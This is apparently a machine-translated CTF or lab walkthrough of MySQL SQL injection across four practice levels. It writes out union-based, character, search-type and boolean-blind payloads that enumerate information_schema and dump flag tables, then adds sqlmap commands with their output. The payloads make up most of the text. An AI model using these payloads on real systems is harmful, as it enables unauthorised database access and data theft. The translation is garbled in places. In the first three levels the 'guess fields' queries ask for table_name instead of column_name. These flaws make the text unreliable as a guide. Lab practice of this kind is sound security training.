What you need to know ：
mysql Medium information_schema Structure is used to store database system information
information_schema The information stored in these tables in the structure , Several tables that can be used in injection .
SCHEMATA ： Store the name of the database ,
——> Key fields ：SCHEMA_NAME, Represents the database name

TABLES ： Storage table name
——> Key fields ：TABLE_SCHEMA Indicates the name of the database to which the table belongs ;
——> Key fields ：TABLE_NAME Indicates the name of the table to which it belongs

COLUMNS ： To store field names
——> Key fields ：COLUMN_NAME Indicates the field name

One 、 Digital injection

1、 Judge the presence of injection :and 1=1 and 1=2 Back to different

2、 Guess database
Get all database names ：
1 and 1=2 union select group_concat(schema_name) from information_schema.schemata;

information_schema,lession1,test
3、 Guess database tables :
obtain "lession1" All table names of the database ：
1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=“lession1”

4、 Guess fields
1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema="lession1"and table_name=“flag”

5、 obtain flag :
1 and 1=2 union select group_concat(flag) from lession1.flag

obtain flag：3347aeb7b48b6d8ca56025a3fc2fab9a
Enter into the input box ：

Click on the submit , Pass to the next level ：

Two 、 Character injection

1、 Judge the presence of injection : amin’and"1’=‘1 amin’and’1’=2 Back to different
2、 Guess database
admin1’ union select group_concat(schema_name) from information_schema.schemata%23;

obtain information_schema,lession2,test
3、 Guess database tables ︰
admin1%27union select group_concat(table_name) from information_schema.tables where table_schema=“lession2”%23

obtain flag surface
4、 Guess fields
admin2%27 union select group_concat(table_name) from information_schema.tables where table_schema=“lession2” and table_name=“flag”%23

Field name is also called flag
5、 obtain flag :
admin2%27union select group_concat(flag)%20from%20lession2.flag%23

obtain flag:d467475c0b0ac1eb2a2d58a0bf204e0e

3、 ... and 、 Search Injection

1、 Judge the presence of injection :
admin%25%27and%201=2
admin%25%27and%201=1 --+ Back to different
2、 Guess database
admin1%25%27union select group_concat(schema_name) from information_schema.schemata%23

obtain information_schema,lession3,test
3、 Guess database tables ︰
admin1%25%27union select group_concat(table_name) from information_schema.tables where table_schema=“lession3”%23

obtain flag surface
4、 Guess fields
admin2%25%27union select group_concat(table_name) from information_schema.tables where table_schema=“lession3” and table_name=“flag”%23

Field name is also called flag
5、 obtain flag :
admin2%25%27union%20select%20group_concat(flag)%20from%20lession3.flag%23

obtain flag：21fb2c6c87d00ae12f0fce84d64cf511

Four 、 Blind injection type

1. Calculate the length of the database in two

id=1 and (select length(group_concat(schema_name)) from information_schema.schemata)=32

The return result is normal , Prove the length of the database
2. Binary search database name

id=1 and ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))>105

Return result error , Prove the first letter of the database name ASCII The code value is not greater than 105
3. Binary lookup table

id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="lession4"),1,1)) >105

Return result error , Prove the first letter of the table name ASCII The code value is not greater than 105

4. Binary lookup table field name

id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="lession4" and table_name="flag"),1,1))>105

Return result error , Prove the first letter of the field name ASCII The code value is not greater than 105

5. Binary search obtains data

id=1 and ascii(substr((select group_concat(flag) from lession4.flag),1,1))>105

Return result error , prove flag The first letter of ASCII The code value is not greater than 105
6. Blind note recommended tools -sqlmap

–batch The batch , Users will be asked some questions during the detection process , Use this parameter to use all default values .
–dbs What database is there in the target server , Commonly used , Direct use –dbs
–current-user The current user , Commonly used , Direct use –current-user
–current-db Current database , Commonly used , Direct use –current-db
–tables What table does the target database have , Commonly used , Direct use –tables
–columns What columns are in the target table , Commonly used , Direct use –colums
–schema Target database database system management mode .
–search Search column 、 Table and / Or database name .
-D DB Specify to query data from a database , Commonly used . example ： -D admindb
-T TBL Specify to query data from a table , Commonly used . example ： -T admintable
-C COL Specify to query data from a column , Commonly used . example ： -C username

Get the complete request packet ：

Save as linghao.txt

py -2 sqlmap.py -r linghao.txt --batch

Find parameters id There is blind injection based on time ,MySQL >= 5.0.12 And time-based blind injection ,
Payload :id=1 AND SLEEP(5)
The back-end database is MySQL,web Server operating system :Linux Ubuntu,web applied technology :PHP 5.5.9, Nginx 1.16.1

py -2 sqlmap.py -r linghao.txt --dbs

Sqlmap through ASCII The code is blindly marked one letter by one , Altogether 3 Data , Find the target database lession4

py -2 sqlmap.py -r linghao.txt -D lession4 --tables

Find the data table name flag

py -2 sqlmap.py -r linghao.txt -D lession4 -T flag --dump

![ Insert picture description here ](https://img-blog.csdnimg.cn/8e19619fc03640a8b95591b91ff18277.png)

obtain flag：0dc8b42164407fc640c86b48d5ec9bf0
Submit flag：

Get the final flag：3347aeb7b48b6d8ca56025a3fc2fab9ad467475c0b0ac1eb2a2d58a0bf204e0e21fb2c6c87d00ae12f0fce84d64cf5110dc8b42164407fc640c86b48d5ec9bf0